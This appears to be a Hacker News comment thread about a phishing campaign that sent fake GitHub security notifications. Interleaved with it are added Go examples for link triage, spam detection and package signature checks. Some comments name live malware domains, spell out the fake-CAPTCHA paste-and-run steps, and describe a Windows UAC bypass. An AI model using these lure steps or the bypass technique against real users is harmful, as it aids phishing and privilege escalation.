Setting aside the hyperbole, such as "everyone and their dog prefixes sudo to all commands" and "most of the FOSS community at large hates users", user/group/other permissions are one part of security in depth. Excessive use of sudo is indicative of an improperly configured system or use of software which lacks understanding of the OS which runs it. Both are causes for concern.

> Windows from the start places the user at the controls with mostly no child safety locks in place ...

To continue your analogy, child safety locks exist to minimize avoidable catastrophic situations for those unable to do same.

> ... with that power you have to accept that if you end up hosing the system the problem is you because Windows doesn't even pretend to really protect you.

At first glance, this has a "victim blaming" flavour to it along the lines of "you should have known better." A more concerning implication is that this perspective does not take into consideration what happens when a blackhat attack is perpetrated.

What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you whom executes it?

0 - https://docs.freebsd.org/en/books/handbook/introduction/


You will have to excuse me for effectively ignoring the rest of your comment since what I'm about to point out more than makes up for the things you pointed out.

>What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you whom executes it?

The benefit is the sheer power to hose Windows with a single Powershell line.

In case that doesn't make sense, let me put it this way: The benefit is the power to do whatever you want with Windows.

Windows essentially will not say no to what you ask of it; you have the freedom to do with your computer as you desire with Windows. With this power, this freedom, this virtue comes responsibility. You as the user must secure the system as desired from the ground up; you have the power to do so and the responsibility.

Computers are tools, Windows enabling your ability to use your computer as a tool is a virtue that is priceless especially in this day and age.

If you don't believe me, consider that Windows brought forth the era of personal computing to the commons and continues to enable them by nurturing an ecosystem that can cater to almost all users' desires that now spans literally decades.


> >What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you whom executes it?

> The benefit is the sheer power to hose Windows with a single Powershell line.

> In case that doesn't make sense, let me put it this way: The benefit is the power to do whatever you want with Windows.

The point which I think I am failing to convey is not about limiting what a person who owns a computer can do with it. Instead, it is that computers interacting with other computers can be introduced to code which is not "whatever you want with Windows", but instead "whatever someone else wants to do with your Windows."

In the case you presented above, nowhere is there consideration of malicious actors. Were this not a real concern, there would be no market for virus scanners (be they for Windows or other operating systems).

Here is an exercise to try out - replace first person tense in the text above with the equivalent of "someone other than me."


I truly don't understand your desire to remove Linux file permissions. I also don't get why you think it's difficult to do so. There are plenty of ways for you to enable yourself to hose your machine without having to enter a password.


> This is a virtue. We can do whatever we want with the computer we own and use.

You certainly don't need to do it with a single line of powershell though. At least, not without intentionally opting into it. For the most part on a daily basis I just want to use my computer, not modify it.

Anyway, at the very least most functionality should be sandboxed so that if someone does something without your consent, it can't do much damage. Though this wasn't the original intention, leveraging user privileges and sandboxing applications by user is an effective way to do this.

Besides what kind of moron would choose proprietary software if they wanted control of their machine? It's inherently a contradictory impulse.


> At least, not without intentionally opting into it.

Just to clarify: in Windows, users with administrative privileges will in theory still be asked to opt in every time before any process is elevated to administrative rights. It's just that Windows security is so awful that people have found many different creative ways around it over the years, but those are (sometimes) getting patched by Microsoft so they are considered "bugs".

For example a process stores its executable path in memory writable by itself, so you could start a process that replaces its executable string to "C:\Windows\explorer.exe" and it would (for whatever reason) bypass the "ask for administrative rights" dialog popup. This is the sort of "security" that Windows is built around to its very core.

https://github.com/hfiref0x/UACME

> "This tool shows ONLY popular UAC bypass method used by malware, and re-implement some of them in a different way improving original concepts. *There are different, not yet known to the general public, methods. Be aware of this;*"

(also i think you are responding to a troll btw)


>(also i think you are responding to a troll btw)

You would be wrong.


That's exactly what a troll would say though :p


Can be summarized with: Don't click on links in email.

So is github-scanner.com (and github-scanner.shop) still the same malicious party? It seems to be. Funny that their DNS is hosted by Cloudflare (who, famously, don't host anything, because they think we're all dumb). Cloudflare, who take responsibility for nothing, has no way to report this kind of abuse to them.

The domain which hosts the malware, 2x.si, both uses Cloudflare for DNS and is hosted by Cloudflare. At least it's possible to report this to Cloudflare, even though they rate limit humans and have CAPTCHAs on their abuse reporting forms.

Sigh. Thanks to Cloudflare, it's trivial these days to host phishing and malware.


Cloudflare is way more responsive to abuse requests than 95% of country level DNS registrars. Having experience working with both.


95% more responsive than 0 is still 0.


I don't know how effective or quick to respond they are, but there is a way to report malware [1]

Extracting from the page

> Which category of abuse to select
> Phishing & Malware

https://www.cloudflare.com/trust-hub/reporting-abuse/


Cloudflare's abuse form will not let you submit the report if you don't include a URL that currently points to their network. There're no options for phishing / scam domains for which they're the registrar and/or DNS hosting.


I haven't tested the form, but they do claim you can report abuse of the registrar with some of the options, perhaps they've changed it?

Failing that:

> If Cloudflare is listed as the registrar on an ICANN WHOIS listing, you also can email reports related to our registrar services to registrar-abuse@cloudflare.com


> Don't click on links in email.

Not saying you're wrong per se, but isn't it more so summarized with "don't fall for a 'CAPTCHA' that requires you to paste code into the window labeled 'This will run with administrative privileges'?"

This is more so a grumble than a serious comment on security, but agh, it's always bugged me that the metric for failing phishing tests is "clicked on any link in the email" and not, you know, entered credentials into the phish site, or downloaded and opened a file. Like, I get it, it's much easier to teach nontechnical users to simply not click bad links than that other stuff - and browser vulns do exist - but it still vaguely annoys me.

I feel like I've seen countless posts like this one that end in the user entering creds, giving the browser some weird permission, downloading some file (sometimes straight-up an executable), or in this case, running a command. I don't know if I've seen a single one that ends in "and then they clicked the link and it popped a browser 0-day and that was the end of that".

Web browsers are a wide attack surface, yes, but they're also... intended for browsing the Internet. Most people click through links pretty haphazardly as they're doing work or researching a topic. Defense in depth and all, but I feel like a security policy that holds "don't visit any evil websites ever" as a core tenet is pretty flawed.


So how do you not click links to confirm your email for a new account?

Rather one could use Qubes OS and only open links in disposable VMs and never enter info beyond that

That's basically what I do when I get emails to confirm my email address for a new account

One can't always avoid clicking links can they?


> So how do you not click links to confirm your email for a new account?

Fair question, but the "don't click links in email" is for emails that you don't expect. And sure, that's an unsatisfying answer because it's hard to communicate this wisdom to your grandmother.

I think the best answer is defense-in-depth. Ensure you use updated email clients, browsers, and OS, and employ a dns blocker like a pihole or equivalent public service.

For less-savvy people a device like an iPad or Chromebook can be a reasonable defense.


If I'm being honest, "don't click links in email unless you were expecting that particular email message" seems easier for grandma than "update x, y, and z, and use Pihole" unless you want to administer her network and devices. But maybe you're saying that an iPad/Chromebook can mitigate all of the above needs? A little bit.

Anyway, while I haven't heard of any cases yet, it wouldn't surprise me if senders of phishing email someday manage to deliver messages shortly after detecting some traffic (DNS lookup?) that you legitimately make with the entity the email is spoofing. Then you're expecting it, roughly.


It is a bit easier, at least. My almost 90 year old Mom now knows to be suspicious of email and to not believe email unless she has a reason to think she should be getting it.

To be fair about setting up a Pihole or some other form of DNS filtering, that's something that the network administrator should do, not individual users. It's a shame that it's still not trivial - companies that make NAT routers resist building in things that they don't completely control, so a configuration page for Pihole in your NAT router's web interface likely isn't coming soon. I hope that changes.

Mom also understands that someone taking over her Nextdoor account would be a nuisance, whereas someone taking over her banking account would be significantly more problematic, so the more important something is, the more time she'll take to ascertain its authenticity.

I practice explaining these things because I do it often. One interesting observation is that Mom believes me, so she does the things I suggest, whereas younger people think they know better, so they generally don't put much energy into my suggestions. I'm working on ways of showing people that they're not necessarily safe because they're "doing the same things they've always done, and nothing bad has happened yet".


> a configuration page for Pihole in your NAT router's web interface likely isn't coming soon. I hope that changes.

In the meantime, the majority of routers do allow you to specify the DNS resolver instead of using whatever it learns via WAN DHCP, so you could put in a filtered public resolver (as opposed to your own Pihole instance) which gives pretty similar results if you don't need to whitelist anything. Plus, you can do the same on mobile devices that roam beyond that router (and avoid VPN through said router). I've been using dns.adguard-dns.com (94.140.14.14 and 94.140.15.15) [0]. They were founded in Moscow but now operate out of Cyprus (EU) and I don't have much of a reason to trust any other DNS operator more than them.

[0] https://adguard-dns.io/en/public-dns.html -- "method 2"


> The attacker quickly deletes the issue

I realized I have never deleted an issue I started, but aren't people with admin access the only ones with the ability to delete issues on a repo? [1] So actually there is a trace for that issue in the repository. Same thing for pull requests.

[1] https://docs.github.com/en/issues/tracking-your-work-with-is...


Maybe GitHub had already deleted it as malicious, but the email was already delivered.


I got this on two org repos yesterday. About an hour after the email, I checked and it was gone. I wanted to report it, even though GitHub scam reports are so very unsatisfying (weeks go by, then random email about how they took some action).

One very simple measure I hope they implement is just not sending emails for unverified spam like this. I’d argue a majority of issues or comments do not need instant emails. Even one hour delay could help in combating abuse like this if they had any sort of reasonable moderation rules.


> GitHub scam reports are so very unsatisfying (weeks go by, then random email about how they took some action).

Either you’re unlucky or I’m lucky, I’ve reported scammers to GitHub multiple times and always got a response in a couple of hours.


Same here, I get frequent spam on one specific (very popular) issue, and they always take care of it within an hour or two. I hide the spam myself to protect the users on the web (I can't do anything about the phishing emails that get sent, though [by default I think?]), and their moderation wipes the spam account and sends a quick email to confirm.

Usually it's a new user who clones a few repositories to pass whatever mitigation they have.

Always get a "lots of reports, this may take a while" email first though. I don't think I ever not got that one.

I think there's something to be said about sending - by default - user generated content by email automatically if you've replied once to a thread. Lots of bad defaults here imho.


I reported spam comment and they acted in less than an hour. I reported the exact spam comment by another user in the same day and they took 3 months to act. It is a very random process.


Repo owners can also edit the title and text of your Issue as well.


Their claim that nothing tells you the email corresponds to the new issue is wrong, the "(Issue #1)" in the title means exactly that. I have actually received the same email myself and immediately recognized it as a new issue created on the repo. This user is obviously not used to GitHub issues as is made clear by the fact that this is the first issue on this repo. I guess GitHub needs to do a better job teaching new users.
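Added example, not from any commenter above and not from the linked write-up: a small Go triage routine that reads a notification the way the comment above describes, pulls the issue number out of the "(Issue #N)" subject tag and classifies every link in the body by host, so a github-scanner.com style lure gets flagged even though the message genuinely came through GitHub. The sample message is constructed; the subject shape and the X-GitHub-Reason header are what GitHub notifications carry, the account and repo names are assumptions.

```go
package main

import (
	"fmt"
	"io"
	"net/mail"
	"net/url"
	"regexp"
	"strconv"
	"strings"
)

// Constructed sample shaped like a GitHub issue notification (not a real
// message). The "(Issue #1)" suffix is how GitHub tags the subject of a
// notification about an issue; the lure domain is the one named in the thread.
const sampleNotification = `From: drive-by-account <notifications@github.com>
Subject: [owner/repo] Important! Security vulnerability detected (Issue #1)
List-ID: owner/repo <repo.owner.github.com>
X-GitHub-Reason: subscribed

We detected a vulnerability in your repository.
Please verify here: https://github-scanner.com/verify
Original thread: https://github.com/owner/repo/issues/1
`

type Link struct {
	URL   string
	Host  string
	Class string // first-party, lookalike, external or invalid
}

type Report struct {
	IssueNumber int    // 0 when the subject carries no "(Issue #N)" tag
	Reason      string // X-GitHub-Reason header, empty if absent
	Links       []Link
	Suspicious  bool // true if any link host merely imitates GitHub
}

var (
	issueRe = regexp.MustCompile(`\(Issue #(\d+)\)\s*$`)
	linkRe  = regexp.MustCompile(`https?://[^\s<>"')]+`)
)

// ClassifyHost separates GitHub's own hosts from hosts that only contain the
// string "github" (github-scanner.com, github.com.evil.example) and from
// unrelated hosts.
func ClassifyHost(host string) string {
	h := strings.ToLower(strings.TrimSuffix(host, "."))
	switch {
	case h == "github.com" || strings.HasSuffix(h, ".github.com"):
		return "first-party"
	case strings.Contains(h, "github"):
		return "lookalike"
	default:
		return "external"
	}
}

func classifyLink(raw string) Link {
	u, err := url.Parse(raw)
	if err != nil || u.Hostname() == "" {
		return Link{URL: raw, Class: "invalid"}
	}
	return Link{URL: raw, Host: u.Hostname(), Class: ClassifyHost(u.Hostname())}
}

// Triage parses one raw RFC 5322 message, reads the issue number out of the
// subject and classifies every link found in the body.
func Triage(rawMessage string) (Report, error) {
	msg, err := mail.ReadMessage(strings.NewReader(rawMessage))
	if err != nil {
		return Report{}, err
	}
	body, err := io.ReadAll(msg.Body)
	if err != nil {
		return Report{}, err
	}
	rep := Report{Reason: msg.Header.Get("X-GitHub-Reason")}
	if m := issueRe.FindStringSubmatch(msg.Header.Get("Subject")); m != nil {
		rep.IssueNumber, _ = strconv.Atoi(m[1])
	}
	for _, raw := range linkRe.FindAllString(string(body), -1) {
		l := classifyLink(raw)
		if l.Class == "lookalike" {
			rep.Suspicious = true
		}
		rep.Links = append(rep.Links, l)
	}
	return rep, nil
}

func main() {
	rep, err := Triage(sampleNotification)
	if err != nil {
		panic(err)
	}
	fmt.Printf("issue #%d reason=%q suspicious=%v\n", rep.IssueNumber, rep.Reason, rep.Suspicious)
	for _, l := range rep.Links {
		fmt.Printf("  %-11s %s\n", l.Class, l.URL)
	}
}
```

The point of the host check is that "contains github" is the attacker's signal, not yours: only an exact github.com or a subdomain of it is first-party, anything else wearing the name is the lure.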


True, but I have worked at companies who employ users that maybe aren't entirely up to speed on the technical details and they have GitHub accounts for submitting bug reports. This would very easily fool some of these people.

Technical people might spot this, but that also isn't a free pass for GitHub to not do better here.


I received one of these notifications this morning and promptly ignored it. I had to laugh because it was about this repo specifically: https://github.com/kyledrake/theftcoinjs


It's worth the read, he shows what they're trying to do.

Easy to be suspicious with the link alone, but it's fun to see someone digging into it.


Just this morning I logged a bug on a GitHub repo and within a minute someone responded with something to the effect of:

Try this, I think it will fix your issue (install GCC if you need a compiler): (Bitly link redirecting to zip file on mediafire) Pass: (something)

GitHub processed my abuse report within an hour and removed all posts by that user.


OMG! I was getting similar GitHub notification emails saying a vulnerability was detected in my repo, but I never figured out they were fake before this news. Anyway, I never clicked because I'm a lazy programmer :) Once it's written it's written; I do rewrite the code but I don't find and fix bugs in my code. :D


The GitHub security alert digest[1] is a real thing. It's a feature of GitHub where they report security vulnerabilities in your project's dependencies. For example, if you use python and you have specified requests library in your requirements.txt, GitHub will send you emails about disclosed vulnerabilities in that library, urging you to upgrade to a higher version where it's fixed.

[1] https://docs.github.com/en/code-security/dependabot/dependab...


I don't understand what's special about this particular attack!>:( When I read the title I thought some automated GitHub emails were forged to sneakily point to a fake GitHub site or something. An obvious (for tech-savvy users) link pointing to an obvious malware (please copy and execute this code to solve the captcha.) If the people you are targeting fall for this why not send an old fashioned spam email with fake headers or via some hacked Wordpress installation? I guess using GitHub notifications is creative but in the end not much different than like sending a facebook message with a fake link, and the user getting an email notification with the message? The analysis of the malware once downloaded was certainly interesting, though!:)


Seriously, how hard can it be for GH to detect that a randomly just-created account is creating issues with the same text, containing a link inside?

I got dozens of such spam during a whole day.
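Added example, not from any commenter: one way the heuristic asked for above could look in Go, run over a constructed feed of "issue opened" records. It keys on account age plus a normalised fingerprint of the body (links, case and punctuation stripped) so the cosmetic variation spammers reach for first does not split the cluster. The record shape, thresholds and account names are assumptions.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"regexp"
	"sort"
	"strings"
	"time"
)

// IssueEvent is one "issue opened" record as a moderation job might see it.
type IssueEvent struct {
	Account    string
	AccountAge time.Duration // age of the account when it opened the issue
	Repo       string
	Body       string
}

// Constructed sample feed: one fresh account spraying the same lure across
// repos with cosmetic variation, one fresh account filing a real bug, one
// long-standing account posting identical text legitimately.
var sampleEvents = []IssueEvent{
	{"drive-by-1", 2 * time.Hour, "alice/widgets", "Important! Security vulnerability detected. Verify at https://github-scanner.com/a1"},
	{"drive-by-1", 2 * time.Hour, "bob/gadgets", "IMPORTANT: security vulnerability detected! verify at https://github-scanner.shop/b2"},
	{"drive-by-1", 2 * time.Hour, "carol/tools", "Important - security vulnerability detected, verify at https://2x.si/c3"},
	{"newbie", 1 * time.Hour, "alice/widgets", "Build fails on Go 1.22, log at https://gist.github.com/newbie/abc"},
	{"veteran", 3 * 365 * 24 * time.Hour, "alice/widgets", "Release notes posted: https://example.org/notes"},
	{"veteran", 3 * 365 * 24 * time.Hour, "bob/gadgets", "Release notes posted: https://example.org/notes"},
	{"veteran", 3 * 365 * 24 * time.Hour, "carol/tools", "Release notes posted: https://example.org/notes"},
}

var (
	urlRe   = regexp.MustCompile(`https?://\S+`)
	punctRe = regexp.MustCompile(`[^\p{L}\p{N} ]+`)
	spaceRe = regexp.MustCompile(` +`)
)

// Fingerprint normalises a body so that swapping the link, the casing or the
// punctuation (the cheap evasions) still yields the same value.
func Fingerprint(body string) string {
	s := urlRe.ReplaceAllString(body, " url ")
	s = strings.ToLower(s)
	s = punctRe.ReplaceAllString(s, " ")
	s = strings.TrimSpace(spaceRe.ReplaceAllString(s, " "))
	sum := sha256.Sum256([]byte(s))
	return hex.EncodeToString(sum[:8])
}

type Policy struct {
	MaxAccountAge time.Duration // younger than this counts as a new account
	MinRepos      int           // same fingerprint in at least this many repos
}

// FlagBursts returns, per flagged account, the repos it sprayed. An account is
// flagged when it is new, its issue bodies carry a link, and the same
// fingerprint shows up across MinRepos or more distinct repositories.
func FlagBursts(events []IssueEvent, p Policy) map[string][]string {
	type key struct{ account, fp string }
	seen := map[key]map[string]bool{}
	for _, e := range events {
		if e.AccountAge > p.MaxAccountAge || !urlRe.MatchString(e.Body) {
			continue
		}
		k := key{e.Account, Fingerprint(e.Body)}
		if seen[k] == nil {
			seen[k] = map[string]bool{}
		}
		seen[k][e.Repo] = true
	}
	flagged := map[string][]string{}
	for k, repos := range seen {
		if len(repos) < p.MinRepos {
			continue
		}
		for r := range repos {
			flagged[k.account] = append(flagged[k.account], r)
		}
		sort.Strings(flagged[k.account])
	}
	return flagged
}

func main() {
	policy := Policy{MaxAccountAge: 24 * time.Hour, MinRepos: 3}
	for account, repos := range FlagBursts(sampleEvents, policy) {
		fmt.Printf("flag %s: same lure in %d repos %v\n", account, len(repos), repos)
	}
}
```

The account-age gate is what keeps a long-standing maintainer who posts the same release note to several repos out of the flagged set; the fingerprint is what keeps "Important!" versus "IMPORTANT:" from looking like two different campaigns.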


Once they introduce that, the texts will become more varied, and links, possibly, too.

There are more possible next steps, which would make creating accounts for spamming more expensive, but they will also inconvenience well-meaning new users.

I suspect that unless the problem of malicious spam from GitHub comments becomes rather serious, acting on a case-by-case basis may be the correct solution.


> Once they introduce that, the texts will become more varied

I’ve said for some time that, while LLMs are varying levels of useful for a lot of people, it’s practically tailor made for spam and phishing. I can’t think of any “product-market-fit” as good as that.

For instance: Imagine combining a leak of personal data from your favorite data broker (who knew that this would come back and bite), with an LLM to bypass spam filters and perform phishing attacks with eerie believable social engineering behind it. All for next to no money.


It's quite sad that in 2024 we still have people falling for the simplest tricks.

This is almost as easy as it was to call someone and asking them for the number of the modem on their desk and their logins back in the bad old days.

Considering the target platform I'm not overly surprised though.


It's quite sad that in 2024 that HN commenters still blame the victim, especially when the original author does a great job suggesting small changes that Microsoft can make to make their products safer for their users.


I turned off most GitHub emails and mostly use the Notification Centre for discovering things I need to know about. It's not entirely proof against phishing this way, but it doesn't get to use email to appear more legitimate.


An excellent slashvertisement for Virus Total. Wrapped in an important cautionary tale about how GitHub issues can be manipulated to try to spread malware.


This has happened for a while. In February of this year, the same attack vector was used in an attack to trick developers into thinking that they'd got a job offer from GitHub: https://www.xorlab.com/en/blog/phishing-on-github


It's worth checking every link you get even if it's from a trusted source, like GitHub... and to be able to restore the data, it's worth having a backup

Months ago I got crypto ads through a similar approach, some fake new account @-ing hundreds of users in an issue and then the issue is removed. The net effect is that the ads become unblockable in your email box (It's from GitHub!).

Maybe devs' target value in general has grown to a point where the openness of the system is more of a vulnerability than a service.


> In text form (link altered for your safety)

Might want to change the image too, macOS recognises the link in that and makes it clickable. I’d say that’s more dangerous than modifying it in the text of the post, you could just as well include a non-clickable text link.


On one hand, I can see the captcha is easy to fall for. On the other, nothing says "prove you aren't a machine" like "run this code that a machine could easily run."


While we're here: what happened to the GitHub explore newsletter? I really enjoyed this, but I've stopped receiving it for a few months now. And I don't think I unsubscribed.


I've also been seeing Typeform emails coming from spam sources. Somehow people are using Typeform's positive reputation score to send emails to arbitrary emails.


Nice writeup! It reminded me a bit of Julia Evans' blog in terms of content (learning by teaching).


>verification steps >winkey+R >Ctrl+V >enter

Of all things that seem legit, this seems the legitest.


Fun how Microsoft is on both ends of the "exploit"


Not hijacked. Faked.


If your method of infecting your victim is having them paste and run a random command on their terminal, software developers are probably the worst group of people to be targeting.


“Curl pipe sh” would like to have a word…

I think you are painting with a broad brush.


This is no different from installing a random package through a package manager. If you're running "curl pipe sh" because an email told you to, that's on you.


No it isn't. Package managers verify the cryptographically signed package. That means the package can be built on a secure server, and then if a mirror becomes malicious or gets compromised, the malicious package won't have a valid signature so the package will not be installed. Running curl and piping it into sh means that not only could a malicious mirror or compromised server execute anything they want on your computer, but they could even send a different script when you curl it into sh vs when you view it any other way, making it much harder to detect[0].

[0] https://web.archive.org/web/20240213030202/https://www.idont...


I think the npm repos would like to have a word with you. Sure glad we've never had a cryptographically signed malicious package delivered via npm install


That's like not wearing a seatbelt because you can still be crushed by a truck. Don't let perfect be the enemy of good. Package managers prevent some attacks that are possible via curl | sh. Some other attacks are still possible. It is still better than not cryptographically verifying the package.


That's like moving the goal posts so you can still try to have a point after the fact. Your comment suggested that package manager was secure while curl | sh isn't because the package manager won't have a valid signature. That's only if the package manager was compromised. A code package that is built to be malicious will still get signed by your manager. Only now, people think they are secure because it was signed.


No it wasn't. The comment I replied to claimed:

> This is no different from installing a random package through a package manager

I replied "No it isn't" in response to that, so I was claiming that a package manager was different (in terms of security) from doing curl | sh.

My comment then went on to explain specific attacks (a mirror being compromised) which are solved by package managers / cryptographic signatures.

At no point did I ever claim package managers were immune to all attacks. A compromised build server, leaked keys, or the upstream program that's being packaged being malicious are all still possible.

It's very simple, my Arch Linux install is pointed at the MIT mirrors. What is stopping the Massachusetts Institute of Technology from replacing my next firefox update with a virus? Cryptographic signatures. They don't have an Arch Linux signing key. What would be stopping them if I installed firefox by doing curl | sh? Nothing.
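Added example, mine rather than any commenter's, and not how pacman is implemented (pacman verifies OpenPGP signatures against a keyring; this is a stripped-down model using Ed25519): the difference argued in the two comments above, a mirror that can rewrite bytes but never holds the distribution's signing key, next to the curl | sh path that executes whatever arrives. Package names and the sample payloads are constructed.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Package is what a mirror hands out: the artifact plus a detached signature
// made by the distribution's build key. The mirror only relays it.
type Package struct {
	Name      string
	Payload   []byte
	Signature []byte
}

// digest binds the package name to its bytes, so a signature over "foo"
// cannot be replayed as a signature over "firefox".
func digest(name string, payload []byte) []byte {
	h := sha256.New()
	h.Write([]byte(name))
	h.Write([]byte{0})
	h.Write(payload)
	return h.Sum(nil)
}

// Sign is the distribution's build step; it runs where the private key lives.
func Sign(priv ed25519.PrivateKey, name string, payload []byte) Package {
	return Package{Name: name, Payload: payload, Signature: ed25519.Sign(priv, digest(name, payload))}
}

var ErrBadSignature = errors.New("payload is not signed by the pinned distribution key")

// InstallVerified is the package-manager path: the client trusts a key it
// pinned out of band, not the host it downloaded from.
func InstallVerified(pinned ed25519.PublicKey, pkg Package) ([]byte, error) {
	if !ed25519.Verify(pinned, digest(pkg.Name, pkg.Payload), pkg.Signature) {
		return nil, ErrBadSignature
	}
	return pkg.Payload, nil
}

// InstallCurlPipeSh is the curl | sh path: whatever came over the wire runs.
func InstallCurlPipeSh(pkg Package) []byte {
	return pkg.Payload
}

// Mirror models an untrusted host (the MIT mirror in the thread, say).
type Mirror struct{ store map[string]Package }

func NewMirror() *Mirror                    { return &Mirror{store: map[string]Package{}} }
func (m *Mirror) Publish(p Package)         { m.store[p.Name] = p }
func (m *Mirror) Fetch(name string) Package { return m.store[name] }

// Compromise is what a malicious operator can do: swap the payload and sign
// it with a key of their own. They cannot sign with the distribution key.
func (m *Mirror) Compromise(name string, malicious []byte) {
	_, attackerPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	m.store[name] = Sign(attackerPriv, name, malicious)
}

type Outcome struct {
	HonestInstallOK      bool // untampered package verifies
	SpliceRejected       bool // original signature over a modified payload is refused
	TamperedRejected     bool // attacker-signed payload is refused
	CurlPipeShRunsTamper bool // the unverified path accepts the swap
}

// Scenario walks through the mirror-compromise case from the thread.
func Scenario() Outcome {
	pinned, buildKey, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	legit := []byte("#!/bin/sh\necho legitimate firefox")
	evil := []byte("#!/bin/sh\necho pwned")

	mirror := NewMirror()
	mirror.Publish(Sign(buildKey, "firefox", legit))
	var out Outcome
	_, err = InstallVerified(pinned, mirror.Fetch("firefox"))
	out.HonestInstallOK = err == nil

	// Keep the real signature, change only the bytes: the digest no longer matches.
	spliced := mirror.Fetch("firefox")
	spliced.Payload = evil
	_, err = InstallVerified(pinned, spliced)
	out.SpliceRejected = errors.Is(err, ErrBadSignature)

	mirror.Compromise("firefox", evil)
	_, err = InstallVerified(pinned, mirror.Fetch("firefox"))
	out.TamperedRejected = errors.Is(err, ErrBadSignature)
	out.CurlPipeShRunsTamper = string(InstallCurlPipeSh(mirror.Fetch("firefox"))) == string(evil)
	return out
}

func main() {
	fmt.Printf("%+v\n", Scenario())
}
```

The thing the model does not cover, and that the later replies about npm are right to raise, is a malicious upstream: if the build key signs malware because the source was malware, verification passes. The signature only answers "did the distribution publish these exact bytes", not "are these bytes safe".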


Couldn't I just publish a package? Then there's malware on the package manager wohooo


The tremendous number of attacks delivered via trusted package repos versus the number of widespread attacks via curl | sh (probably roughly zero) means that, theories aside, one of these is far more commonly abused than the other.


Both are examples of developer-types doing risky things, which was my point and also supports my point that developers are not exclusively better secured than non-developer types.


You just need a handful of people to fall for it, and a population of a hundred million daily active users on GitHub means there are always a handful of people to trick.


you'd be surprised at the quality of the average dev


My only encounter with this is that I am annoyed if I open web dev tools on a new browser profile/guest profile, but am interrupted in my workflow because first I have to type "allow pasting" every single time. (Why do I do this quite often? To be sure to have a clean state when debugging a web app.) And all this because some people cannot think before they follow obscure instructions sent to them by an untrusted party?

Why can't we have nice things again? Because of abusers yes, but also because of sheep people.


Hard disagree. Developers aren't magically tech wizards, many of them will struggle to install a printer. I've seen one spend fifteen minutes on adding a keyboard layout in Windows last week (granted, the process was very unintuitive).

It's this "I'm a developer, I'm too smart to fall for phishing" mindset that makes developers an excellent target for malware.


No org is safe, not even Github..


so many red-flags, i don't know how someone could go beyond and click this link.


These hackers need to work on the rest of their funnel lmao. Getting me to click the link would be easy, but running that script? Never in a million years!


woah


If you're stupid enough to paste something off a random website (that you discovered through a random email link) into the command line (and then execute it), then you deserve what happens next. At some point the end user is to blame.

I also have no clue why any reasonable person would refer to that monstrosity as a CAPTCHA.


This is neither hijacking notifications nor sending malware. This is someone including a link in a message on a ticketing system open to the public, and then someone clicking on the link and downloading malware.



